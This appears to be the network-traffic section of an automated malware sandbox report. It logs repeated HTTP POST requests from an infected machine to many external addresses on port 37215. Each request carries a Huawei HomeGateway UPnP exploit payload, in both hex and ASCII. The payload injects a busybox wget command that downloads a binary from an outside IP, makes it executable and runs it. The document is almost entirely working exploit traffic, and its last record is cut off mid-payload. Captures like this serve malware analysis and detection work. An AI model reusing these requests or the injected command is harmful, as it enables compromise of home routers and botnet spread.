                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2082192.168.2.155739641.71.96.2037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668143988 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2083192.168.2.153931441.7.57.2537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668158054 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2084192.168.2.153855241.40.40.17937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668159962 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2085192.168.2.155959241.114.92.4537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668200970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2086192.168.2.154336241.141.144.9537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668201923 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2087192.168.2.155114241.2.120.6837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668204069 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2088192.168.2.156014041.191.87.19837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668252945 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2089192.168.2.154326441.18.196.17437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668256044 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2090192.168.2.154535441.28.216.11637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668256044 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2091192.168.2.153526841.233.223.23637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.668256044 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 